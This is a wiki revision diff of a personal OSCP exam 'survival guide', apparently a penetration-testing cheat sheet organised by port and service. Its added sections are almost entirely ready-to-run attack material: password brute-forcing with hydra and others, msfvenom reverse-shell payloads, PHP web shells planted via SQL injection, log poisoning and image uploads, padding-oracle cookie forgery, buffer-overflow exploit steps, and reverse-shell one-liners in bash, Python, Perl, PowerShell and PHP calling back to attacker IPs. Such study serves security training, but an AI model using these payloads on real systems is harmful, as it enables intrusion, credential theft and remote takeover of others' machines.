Outils d'utilisateurs

Outils du Site


oscp_survival_guide

Différences

Cette page vous donne les différences entre la révision choisie et la version actuelle de la page.

Lien vers cette vue

oscp_survival_guide [2021/02/06 20:56]
M0N5T3R
oscp_survival_guide [2021/02/06 22:47] (Version actuelle)
M0N5T3R
Ligne 1: Ligne 1:
-f 
 ---- ----
  
Ligne 2722: Ligne 2721:
  
          
-====== EDIT: Useful and fast exploit : ======+====== EDIT: Useful and fast exploit - Cheat sheet : ====== 
 + 
 +**Port 22 - SSH**  
 +<code> 
 +hydra -l $USERNAME -P /usr/share/wordlists/wfuzz/others/common_pass.txt ssh://$RHOST 
 +</code> 
 + 
 + 
 +**Port 25 - SMTP **  
 +<code> 
 +nc 10.11.1.217 25 
 +[...] 
 +VRFY root 
 +252 2.0.0 root 
 +</code> 
 + 
 + 
 + 
 +**Port 53 - DNS**  
 +<code> 
 +dig axfr @$RHOST DOMAIN.COM 
 +dnsrecon -d DOMAIN.COM 
 +</code> 
  
  
 **Port 69 - UDP - TFTP** **Port 69 - UDP - TFTP**
-#nmap -p69 --script=tftp-enum.nse 10.11.1.111+<code>#nmap -p69 --script=tftp-enum.nse 10.11.1.111</code>
  
 #exploit AT-TFTP 1.9 : https://github.com/brianwrf/cve-2006-6184 #exploit AT-TFTP 1.9 : https://github.com/brianwrf/cve-2006-6184
-perl -e 'print ""\x81\xec\xac\x0d\x00\x00""' > stackadj+<code>perl -e 'print ""\x81\xec\xac\x0d\x00\x00""' > stackadj
 msfvenom -p windows/shell/reverse_nonx_tcp LHOST=10.11.0.x LPORT=443 R > payload msfvenom -p windows/shell/reverse_nonx_tcp LHOST=10.11.0.x LPORT=443 R > payload
 cat stackadj payload > shellcode cat stackadj payload > shellcode
 cat shellcode | msfvenom -e x86/shikata_ga_nai -b ""\x00"" -a x86 --platform win -f python cat shellcode | msfvenom -e x86/shikata_ga_nai -b ""\x00"" -a x86 --platform win -f python
 +</code>
  
 **Port 88 - Kerberos**  **Port 88 - Kerberos** 
 +<code>
 +- MS14-068
 +- GetUserSPNs
 +GET USERS:
 nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='DOMAIN.LOCAL'" IP nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='DOMAIN.LOCAL'" IP
 use auxiliary/gather/kerberos_enumusers use auxiliary/gather/kerberos_enumusers
Ligne 2742: Ligne 2768:
 python kerbrute.py -dc-ip IP -users /root/htb/kb_users.txt -passwords /root/pass_common_plus.txt -threads 20 -domain DOMAIN -outputfile kb_extracted_passwords.txt python kerbrute.py -dc-ip IP -users /root/htb/kb_users.txt -passwords /root/pass_common_plus.txt -threads 20 -domain DOMAIN -outputfile kb_extracted_passwords.txt
 https://blog.stealthbits.com/extracting-service-account-passwords-with-kerberoasting/ https://blog.stealthbits.com/extracting-service-account-passwords-with-kerberoasting/
 +nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='DOMAIN.LOCAL'" IP
 +use auxiliary/gather/kerberos_enumusers
 +https://www.tarlogic.com/blog/como-funciona-kerberos/
 +https://www.tarlogic.com/blog/como-atacar-kerberos/
 +python kerbrute.py -dc-ip IP -users /root/htb/kb_users.txt -passwords /root/pass_common_plus.txt -threads 20 -domain DOMAIN -outputfile kb_extracted_passwords.txt
 +https://blog.stealthbits.com/extracting-service-account-passwords-with-kerberoasting/
 +</code>
 +
  
 **Port 111 - Rpcbind** **Port 111 - Rpcbind**
 +<code>
 +nmap -sV -p 111 --script=rpcinfo $RHOST
 +nmap -p 111 --script nfs* $RHOST
 +mount -t nfs -o vers=3 $RHOST:/SHARENAME /mnt
 +groupadd --gid 1337 pwn
 +useradd --uid 1337 -g pwn pwn
 +
 +
 +
 rpcinfo -p 10.11.1.111 rpcinfo -p 10.11.1.111
 rpcclient -U "" 10.11.1.111 rpcclient -U "" 10.11.1.111
Ligne 2752: Ligne 2795:
  netshareenum  netshareenum
  netshareenumall  netshareenumall
 +</code>
  
  
 **Port 135 - MSRPC** **Port 135 - MSRPC**
-nmap 10.11.1.111 --script=msrpc-enum+<code>nmap 10.11.1.111 --script=msrpc-enum
 msf > use exploit/windows/dcerpc/ms03_026_dcom msf > use exploit/windows/dcerpc/ms03_026_dcom
 +</code>
  
 +
 +**Port 161 -  SNMP**
 +<code>snmp-check $RHOST
 +onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt $RHOST
 +snmpwalk -v1 -c public $RHOST
 +nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes $IP
 +nmap -sU -p 161 --script /usr/share/nmap/scripts/snmp-win32-users.nse $IP
 +</code>
  
 **Port 139/445 - SMB** **Port 139/445 - SMB**
-# Get Version+<code># Get Version
 smbver.sh 10.11.1.111 smbver.sh 10.11.1.111
 Msfconsole;use scanner/smb/smb_version Msfconsole;use scanner/smb/smb_version
Ligne 2866: Ligne 2918:
 listening on [any] 443 ... listening on [any] 443 ...
 C:\WINDOWS\system32> C:\WINDOWS\system32>
 +</code>
  
 **Port 161/162 UDP - SNMP** **Port 161/162 UDP - SNMP**
-nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes 10.11.1.111 +<code>nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes 10.11.1.111 
-snmp-check 10.11.1.111 -c public|private|community+snmp-check 10.11.1.111 -c public|private|community</code>
  
  
-**LDAP - 389,636** +**Port 389,636 - LDAP ** 
-ldapsearch -h 10.11.1.111 -p 389 -x -b "dc=mywebsite,dc=com"+<code>ldapsearch -h 10.11.1.111 -p 389 -x -b "dc=mywebsite,dc=com"
 ldapsearch -x -h 10.11.1.111 -D 'DOMAIN\user' -w 'hash-password' ldapsearch -x -h 10.11.1.111 -D 'DOMAIN\user' -w 'hash-password'
 ldapdomaindump 10.11.1.111 -u 'DOMAIN\user' -p 'hash-password' ldapdomaindump 10.11.1.111 -u 'DOMAIN\user' -p 'hash-password'
 patator ldap_login host=10.10.1.111 1=/root/Downloads/passwords_ssh.txt user=hsmith password=FILE1 -x ignore:mesg='Authentication failed.' patator ldap_login host=10.10.1.111 1=/root/Downloads/passwords_ssh.txt user=hsmith password=FILE1 -x ignore:mesg='Authentication failed.'
 +</code>
  
- +**Port 443 - HTTPS** 
-**HTTPS - 443** +<code>Read the actual SSL CERT to:
-Read the actual SSL CERT to:+
 find out potential correct vhost to GET find out potential correct vhost to GET
 is the clock skewed is the clock skewed
Ligne 2889: Ligne 2941:
 nmap -sV --script=ssl-heartbleed 10.1.10.111 nmap -sV --script=ssl-heartbleed 10.1.10.111
 mod_ssl,OpenSSL version Openfuck mod_ssl,OpenSSL version Openfuck
 +</code>
  
-**500 - ISAKMP IKE** +**Port  500 - ISAKMP IKE** 
-ike-scan 10.11.1.111+<code>ike-scan 10.11.1.111</code>
  
-**513 - Rlogin** +**Port 513 - Rlogin** 
-apt install rsh-client+<code>apt install rsh-client
 rlogin -l root 10.11.1.111 rlogin -l root 10.11.1.111
 +</code>
  
 +**Port 541 - FortiNet SSLVPN**
 +<code>https://devco.re/blog/2019/08/09/attacking-ssl-vpn-part-2-breaking-the-Fortigate-ssl-vpn/
 +</code>
  
-**541 - FortiNet SSLVPN** +**Port 1433 - MSSQL** 
-https://devco.re/blog/2019/08/09/attacking-ssl-vpn-part-2-breaking-the-Fortigate-ssl-vpn/ +<code>nmap -p 1433 -sU --script=ms-sql-info.nse 10.11.1.111
- +
- +
-**1433 - MSSQL** +
-nmap -p 1433 -sU --script=ms-sql-info.nse 10.11.1.111+
 use auxiliary/scanner/mssql/mssql_ping use auxiliary/scanner/mssql/mssql_ping
 use auxiliary/scanner/mssql/mssql_login use auxiliary/scanner/mssql/mssql_login
Ligne 2909: Ligne 2962:
 sqsh -S 10.11.1.111 -U sa sqsh -S 10.11.1.111 -U sa
  xp_cmdshell 'date'  xp_cmdshell 'date'
 +</code>
  
 **Port 1521 - Oracle** **Port 1521 - Oracle**
-oscanner -s 10.11.1.111 -P 1521+<code>oscanner -s 10.11.1.111 -P 1521
 tnscmd10g version -h 10.11.1.111 tnscmd10g version -h 10.11.1.111
 tnscmd10g status -h 10.11.1.111 tnscmd10g status -h 10.11.1.111
Ligne 2928: Ligne 2981:
 and run it: and run it:
 ./odat-libc2.5-i686 externaltable -s 10.11.1.111 -p 1521 -U scott -P tiger -d XE --sysdba --exec c:/ shell.exe ./odat-libc2.5-i686 externaltable -s 10.11.1.111 -p 1521 -U scott -P tiger -d XE --sysdba --exec c:/ shell.exe
 +</code>
  
 **Port 2049 - NFS** **Port 2049 - NFS**
-showmount -e 10.11.1.111+<code>showmount -e 10.11.1.111
 If you find anything you can mount it like this: If you find anything you can mount it like this:
 mount 10.11.1.111:/ /tmp/NFS mount 10.11.1.111:/ /tmp/NFS
 mount -t 10.11.1.111:/ /tmp/NFS mount -t 10.11.1.111:/ /tmp/NFS
 +</code>
 +
  
 **Port 2100 - Oracle XML DB** **Port 2100 - Oracle XML DB**
-Default passwords https://docs.oracle.com/cd/B10501_01/win.920/a95490/username.htm+<code>Default passwords https://docs.oracle.com/cd/B10501_01/win.920/a95490/username.htm 
 +</code> 
  
 **Port 3306 - MySQL** **Port 3306 - MySQL**
-nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse 10.11.1.111 -p 3306+<code>nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse 10.11.1.111 -p 3306
 mysql --host=10.11.1.111 -u root -p mysql --host=10.11.1.111 -u root -p
 MYSQL UDF  MYSQL UDF 
 https://www.adampalmer.me/iodigitalsec/2013/08/13/mysql-root-to-system-root-with-udf-for-windows-and-linux/ https://www.adampalmer.me/iodigitalsec/2013/08/13/mysql-root-to-system-root-with-udf-for-windows-and-linux/
 +</code>
 +
  
 **Port 3389 - RDP** **Port 3389 - RDP**
Ligne 2953: Ligne 3013:
  
 **VNC - 5900** **VNC - 5900**
-nmap --script=vnc-info,vnc-brute,vnc-title -p 5900 10.11.1.111+<code>nmap --script=vnc-info,vnc-brute,vnc-title -p 5900 10.11.1.111 
 +</code>
  
-**WinRM - 5985** + 
-https://github.com/Hackplayers/evil-winrm+**RealVNC** 
 +<code>RealVNC : https://www.exploit-db.com/exploits/36932 
 +Edit, BIND_ADDR into mine and BIND_PORT into 4444 
 +root@kali:~/PWK$python RealVNC-exploit-36932.py 
 +[] Please input an IP address to pwn: 10.11.1.x 
 +[] Hello From Server: RFB 003.008 
 +Ctrl+Alt+Shift+Del will be vmware’s ctrl+alt+del 
 +</code> 
 + 
 + 
 +**Port 5985 - WinRM ** 
 +<code>https://github.com/Hackplayers/evil-winrm
 gem install evil-winrm gem install evil-winrm
 evil-winrm -i 10.11.1.111 -u Administrator -p 'password1' evil-winrm -i 10.11.1.111 -u Administrator -p 'password1'
 evil-winrm -i 10.11.1.111 -u Administrator -H 'hash-pass' -s /scripts/folder evil-winrm -i 10.11.1.111 -u Administrator -H 'hash-pass' -s /scripts/folder
 +</code>
  
  
-**Redis - 6379** + 
-https://github.com/Avinash-acid/Redis-Server-Exploit+**Port 6379 - Redis ** 
 +<code>https://github.com/Avinash-acid/Redis-Server-Exploit
 python redis.py 10.10.10.160 redis python redis.py 10.10.10.160 redis
 +</code>
  
-**MsDeploy - 8172** + 
-Microsoft IIS Deploy port+**Port 8172 - MsDeploy ** 
 +<code>Microsoft IIS Deploy port
 IP:8172/msdeploy.axd IP:8172/msdeploy.axd
 +</code>
 +
  
 **Port 8080- Groovy RCE** **Port 8080- Groovy RCE**
-def process = "cmd /c whoami".execute();println "${process.text}";+<code>def process = "cmd /c whoami".execute();println "${process.text}";
 #Groovy RevShell #Groovy RevShell
 String host="localhost"; String host="localhost";
Ligne 2977: Ligne 3055:
 String cmd="cmd.exe"; String cmd="cmd.exe";
 Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);Inpu Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);Inpu
 +</code>
  
  
  
 +**Port 8080- SquirrelMail <= 1.4.23 Remote Code Execution PoC Exploit (CVE-2017-7692)**
 +<code>https://raw.githubusercontent.com/xl7dev/Exploit/master/SquirrelMail/SquirrelMail_RCE_exploit.sh
 +</code>
  
-SquirrelMail <= 1.4.23 Remote Code Execution PoC Exploit (CVE-2017-7692) 
-https://raw.githubusercontent.com/xl7dev/Exploit/master/SquirrelMail/SquirrelMail_RCE_exploit.sh 
  
-RealVNC 
-RealVNC : https://www.exploit-db.com/exploits/36932 
-Edit, BIND_ADDR into mine and BIND_PORT into 4444 
-root@kali:~/PWK$python RealVNC-exploit-36932.py 
-[] Please input an IP address to pwn: 10.11.1.x 
-[] Hello From Server: RFB 003.008 
-Ctrl+Alt+Shift+Del will be vmware’s ctrl+alt+del 
  
 +**XAMPP**
 +<code>XAMPP cred(wampp/xampp)
 +</code>    
  
-XAMPP +**ColdFusion (Vulnerable)** 
-XAMPP cred(wampp/xampp) +<code>Version check : http://example.com/CFIDE/adminapi/base.cfc?wsdl
-     +
- +
-ColdFusion (Vulnerable) +
-Version check : http://example.com/CFIDE/adminapi/base.cfc?wsdl+
 LFI(passowrd file) : http://server/CFIDE/administrator/enter.cfm?locale=…/…/…/…/…/…/…/…/…/…/ColdFusion8/lib/password.propertiesen LFI(passowrd file) : http://server/CFIDE/administrator/enter.cfm?locale=…/…/…/…/…/…/…/…/…/…/ColdFusion8/lib/password.propertiesen
 (either – neo-security.xml and password.properties) (either – neo-security.xml and password.properties)
 ref : https://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/ ref : https://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/
 exploit/windows/http/coldfusion_fckeditor – only for 8.0.1 exploit/windows/http/coldfusion_fckeditor – only for 8.0.1
 +</code>
  
-Webdav+ 
 +**Webdav** 
 +<code>
 WebDav Vulnerability Check : nmap -T4 -p80 --script=http-iis-webdav-vuln 10.11.1.x WebDav Vulnerability Check : nmap -T4 -p80 --script=http-iis-webdav-vuln 10.11.1.x
 auxiliary : webdav_test auxiliary : webdav_test
Ligne 3011: Ligne 3086:
 1 dav:> put shells.txt 1 dav:> put shells.txt
 2 dav:> copy shells.txt shells.asp;.txt 2 dav:> copy shells.txt shells.asp;.txt
 +</code>
 +
  
-PHPAdmin  +**PHPAdmin**  
-http://.../phpmyadmin+<code>http://.../phpmyadmin
 db and password located @ /etc/phpmyadmin/config-db.php and default cred can be; (root/blank)(pma/blank) db and password located @ /etc/phpmyadmin/config-db.php and default cred can be; (root/blank)(pma/blank)
 You can also bruteforce by sh hydra 10.10.10.43 -l admin -P /usr/share/dict/rockyou.txt http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid Password!" You can also bruteforce by sh hydra 10.10.10.43 -l admin -P /usr/share/dict/rockyou.txt http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid Password!"
 +</code>
 +
  
-Tomcat  +**Tomcat**  
-Default cred for Tomcat;“tomcat/tomcat” and check out /manager console by navigating to browsereg. http://10.11.1.x:8080/manager/html+<code>Default cred for Tomcat;“tomcat/tomcat” and check out /manager console by navigating to browsereg. http://10.11.1.x:8080/manager/html
 You can upload reverse shell on manager consor ; msfvenom jsp or war file You can upload reverse shell on manager consor ; msfvenom jsp or war file
 msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.11.0.x LPORT=443 -f war > shell.war msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.11.0.x LPORT=443 -f war > shell.war
 jar -xvf shell.war jar -xvf shell.war
 +</code>
  
- +**Windows IIS**  
-Windows IIS  +<code>Getting Windows 0S and version details through Nikto / Nmap Scanning.
-Getting Windows 0S and version details through Nikto / Nmap Scanning.+
 auxiliary/admin/http/iis_auth_bypass auxiliary/admin/http/iis_auth_bypass
 +</code>
  
-mysql+**mysql** 
 +<code>
 nmap -sV -Pn -vv –script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 10.0.0.1 -p 3306 nmap -sV -Pn -vv –script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 10.0.0.1 -p 3306
 MySQL login : sh mysql -h 192.168.88.152 -D wordpress -u root -p plbkac MySQL login : sh mysql -h 192.168.88.152 -D wordpress -u root -p plbkac
Ligne 3036: Ligne 3117:
 OPEN A PHP SHELL : OPEN A PHP SHELL :
 ' union select ""<?php system($_REQUEST['cmd']); ?>"" INTO OUTFILE  ' union select ""<?php system($_REQUEST['cmd']); ?>"" INTO OUTFILE 
 +</code>
  
  
  
- +**ShellShock** 
- +<code>
- +
- +
- +
- +
-MSRPC - PORT 135 +
-nmap 10.11.1.111 --script=msrpc-enum +
-msf use exploit/windows/dcerpc/ms03_026_dcom +
- +
- +
-ShellShock+
 nikto scan results; shows shellshock on /cgi-bin; use 34900.py nikto scan results; shows shellshock on /cgi-bin; use 34900.py
 root@kali:~/Exam/Sicos1# python 34900.py payload=reverse rhost=192.168.88.155 lhost=192.168.88.157 lport=1234 root@kali:~/Exam/Sicos1# python 34900.py payload=reverse rhost=192.168.88.155 lhost=192.168.88.157 lport=1234
 [!] Started reverse shell handler [!] Started reverse shell handler
 [-] Trying exploit on : /cgi-bin/status" [-] Trying exploit on : /cgi-bin/status"
 +</code>
 +
  
-Squid  +**Squid**  
-proxy scanner/http/squid_pivot_scanning+<code>proxy scanner/http/squid_pivot_scanning
 RHOST : Target RHOST : Target
 RANGE : Target RANGE : Target
Ligne 3066: Ligne 3140:
 if the target uses squid proxy via 3128 port, use nikto with that proxy setting  if the target uses squid proxy via 3128 port, use nikto with that proxy setting 
 nikto -h 192.168.88.155 -useproxy http://192.168.88.155:3128" nikto -h 192.168.88.155 -useproxy http://192.168.88.155:3128"
 +</code>
 +
 +
 +**LFI**
 +<code>
 +fimap -u "http://10.11.1.111/example.php?test="
 +
 +# Ordered output
 +curl -s http://10.11.1.111/gallery.php?page=/etc/passwd
 +/root/Tools/Kadimus/kadimus -u http://10.11.1.111/example.php?page=
 +
 +http://10.11.1.111/index.php?page=php://filter/convert.base64-encode/resource=/etc/passwd && base64 -d savefile.php
 +http://10.11.1.111/page=http://10.11.1.111/maliciousfile.txt%00 or ?
 +?page=php://filter/convert.base64-encode/resource=../config.php
 +../../../../../boot.ini
 +
 +amap -d 10.11.1.111 8000
 +
 +# LFI Windows
 +http://10.11.1.111/addguestbook.php?LANG=../../windows/system32/drivers/etc/hosts%00
 +
 +# Contaminating log files
 +root@kali:~# nc -v 10.11.1.111 80
 +10.11.1.111: inverse host lookup failed: Unknown host
 +(UNKNOWN) [10.11.1.111] 80 (http) open
 + <?php echo shell_exec($_GET['cmd']);?> 
 + 
 +http://10.11.1.111/addguestbook.php?LANG=../../xampp/apache/logs/access.log%00&cmd=ipconfig
 +</code>
 +
 +
  
-RFI(Remote File Inclusion)  +**RFI(Remote File Inclusion)**  
-browse.php?file=http://10.11.0.x/index.html+<code>browse.php?file=http://10.11.0.x/index.html
 browse.php?file=ftp://10.11.0.x/index.html browse.php?file=ftp://10.11.0.x/index.html
 browse.php?expect://ls browse.php?expect://ls
Ligne 3074: Ligne 3179:
 Uploading malicious .php file on database  Uploading malicious .php file on database 
 http://hackingandsecurity.blogspot.com/2017/08/proj-12-exploiting-php-vulnerabilities.html http://hackingandsecurity.blogspot.com/2017/08/proj-12-exploiting-php-vulnerabilities.html
 +</code>
  
  
-Kerberos  +**Cookies error padding:** 
-- MS14-068 +&lt;code&gt
-- GetUserSPNs +# Get cookie structure 
-GET USERS+padbuster http://10.10.1.111/index.php xDwqvSF4SK1BIqPxM9fiFxnWmF+wjfka 8 -cookies "user=xDwqvSF4SK1BIqPxM9fiFxnWmF+wjfka" -error "Invalid padding" 
-nmap -p 88 --script=krb5-enum-users --script-args=&quot;krb5-enum-users.realm='DOMAIN.LOCAL'&quotIP +# Get cookie for other user (impersonation) 
-use auxiliary/gather/kerberos_enumusers +padbuster http://10.10.1.111/index.php xDwqvSF4SK1BIqPxM9fiFxnWmF+wjfka 8 -cookies "user=xDwqvSF4SK1BIqPxM9fiFxnWmF+wjfka" -error "Invalid padding" -plaintext 'user=administratorme' 
-https://www.tarlogic.com/blog/como-funciona-kerberos/ +</code>
-https://www.tarlogic.com/blog/como-atacar-kerberos/ +
-python kerbrute.py -dc-ip IP -users /root/htb/kb_users.txt -passwords /root/pass_common_plus.txt -threads 20 -domain DOMAIN -outputfile kb_extracted_passwords.txt +
-https://blog.stealthbits.com/extracting-service-account-passwords-with-kerberoasting/+
  
  
  
 +**Bypass image upload restrictions**
 +<code>
 +- Change extension: .pHp3 or pHp3.jpg
 +- Modify mimetype: Content-type: image/jpeg
 +- Bypass getimagesize(): exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' file.jpg
 +- Add gif header: GIF89a;
 +- All at the same time.
 +</code>
  
-******************* +**Password brute force - last resort** 
-* note            *  +<code> 
-*******************+cewl 
 +hash-identifier 
 +john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt 
 +medusa -h 10.11.1.111 -u admin -P password-file.txt -M http -m DIR:/admin -T 10 
 +ncrack -vv --user offsec -P password-file.txt rdp://10.11.1.111 
 +crowbar -b rdp -s 10.11.1.111/32 -u victim -C /root/words.txt -n 1 
 +hydra -l root -P password-file.txt 10.11.1.111 ssh 
 +hydra -P password-file.txt -v 10.11.1.111 snmp 
 +hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 10.11.1.111 ftp -V 
 +hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 10.11.1.111 pop3 -V 
 +hydra -P /usr/share/wordlistsnmap.lst 10.11.1.111 smtp -V 
 + 
 +# SIMPLE LOGIN GET 
 +hydra -L cewl_fin_50.txt -P cewl_fin_50.txt 10.11.1.111 http-get-form "/~login:username=^USER^&password=^PASS^&Login=Login:Unauthorized" -V 
 + 
 +# GET FORM with HTTPS 
 +hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.11.1.111 -s 443 -S https-get-form "/index.php:login=^USER^&password=^PASS^:Incorrect login/password\!" 
 + 
 +# SIMPLE LOGIN POST 
 +hydra -l root@localhost -P cewl 10.11.1.111 http-post-form "/otrs/index.pl:Action=Login&RequestedURL=&Lang=en&TimeOffset=-120&User=^USER^&Password=^PASS^:F=Login failed" -I 
 + 
 +# API REST LOGIN POST 
 +hydra -l admin -P /usr/share/wordlists/wfuzz/others/common_pass.txt -V -s 80 10.11.1.111 http-post-form "/centreon/api/index.php?action=authenticate:username=^USER^&password=^PASS^:Bad credentials" -t 64 
 + 
 +# Dictionary creation 
 +https://github.com/LandGrey/pydictor 
 +https://github.com/Mebus/cupp 
 +git clone https://github.com/sc0tfree/mentalist.git 
 +</code> 
 + 
 + 
 +**BOF** 
 +<code> 
 +# BASIC GUIDE 
 +1. Send "A"*1024 
 +2. Replace "A" with /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l LENGTH 
 +3. When crash "!mona findmsp" (E10.11.1.111 offset) or ""/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q TEXT" or "!mona pattern_offset eip" 
 +4. Confirm the location with "B" and "C" 
 +5. Check for badchars instead CCCC (ESP): 
 +badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 
 +with script _badchars.py and  
 +"!mona compare -a esp -f C:\Users\IEUser\Desktop\badchar_test.bin" 
 + 5.1 AWESOME WAY TO CHECK BADCHARS (https://bulbsecurity.com/finding-bad-characters-with-immunity-debugger-and-mona-py/): 
 + a. !mona config -set workingfolder c:\logs\%p 
 +     b. !mona bytearray -b "\x00\x0d" 
 +     c. Copy from c:\logs\%p\bytearray.txt to python exploit and run again 
 +     d. !mona compare -f C:\logs\%p\bytearray.bin -a 02F238D0 (ESP address) 
 +     e. In " data", before unicode chars it shows badchars. 
 + 6. Find JMP ESP with "!mona modules" or "!mona jmp -r esp" or "!mona jmp -r esp -cpb '\x00\x0a\x0d'" find one with security modules "FALSE" 
 +  
 + 6.1 Then, "!mona find -s "\xff\xe4" -m PROGRAM/DLL-FALSE" 
 + 6.2 Remember put the JMP ESP location in reverse order due to endianness: 5F4A358F will be \x8f\x35\x4a\x5f 
 + 
 + 
 +7. Generate shellcode and place it: 
 +msfvenom -p windows/shell_reverse_tcp LHOST=10.11.1.111 LPORT=4433 -f python –e x86/shikata_ga_nai -b "\x00" 
 + 
 +msfvenom -p windows/shell_reverse_tcp lhost=10.11.1.111 lport=443 EXITFUNC=thread -a x86 --platform windows -b "\x00\x0a\x0d" -e x86/shikata_ga_nai -f python -v shellcode 
 + 
 +8. Final buffer like: 
 +buffer="A"*2606 + "\x8f\x35\x4a\x5f" + "\x90" 8 + shellcode 
 +</code> 
 + 
 + 
 +** Reverse Shells ** 
 +<code> 
 +# Linux  
 +bash -i >& /dev/tcp/10.11.1.111/4443 0>&1 
 +rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.1.111 4443 >/tmp/f 
 +nc -e /bin/sh 10.11.1.111 4443 
 + 
 +# Python 
 +python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.1.111",4443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' 
 + 
 +__import__('os').system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.9 4433 >/tmp/f')-1\ 
 + 
 +# Perl 
 +perl -e 'use Socket;$i="10.11.1.111";$p=4443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' 
 + 
 +# Windows 
 +nc -e cmd.exe 10.11.1.111 4443 
 +powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.11',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" 
 + 
 +# PHP most simple Linux 
 +<?php $sock = fsockopen("10.11.1.111",1234); $proc = proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock), $pipes);?> 
 +</code> 
 + 
 + 
 + 
 + 
 +**Disable ASLR on linux machine** 
 +<code> 
 +echo 0 > /proc/sys/kernel/randomize_va_space 
 +</code> 
 + 
 + 
 + 
 + 
 +**Get full shell on jail shelle** 
 +<code> 
 +python -c “import pty;pty.spawn(‘/bin/sh’);”  
 +echo ‘os.system(‘/bin/bash’)’ 
 +perl -e ‘exec “/bin/sh”;’ 
 +</code> 
 + 
 + 
 + 
 + 
 +** Find and locate the flags  ** 
 +<code> 
 +#Linux: 
 +echo " ";echo "uname -a:";uname -a;echo " ";echo "hostname:";hostname;echo " ";echo "id";id;echo " ";echo "ifconfig:";/sbin/ifconfig -a;echo " ";echo "proof:";cat /root/proof.txt 2>/dev/null; cat /Desktop/proof.txt 2>/dev/null;echo " " 
 +find / -name "network-secret.txt" 
 +locate "network-secret.txt" 
 + 
 +#Windows: 
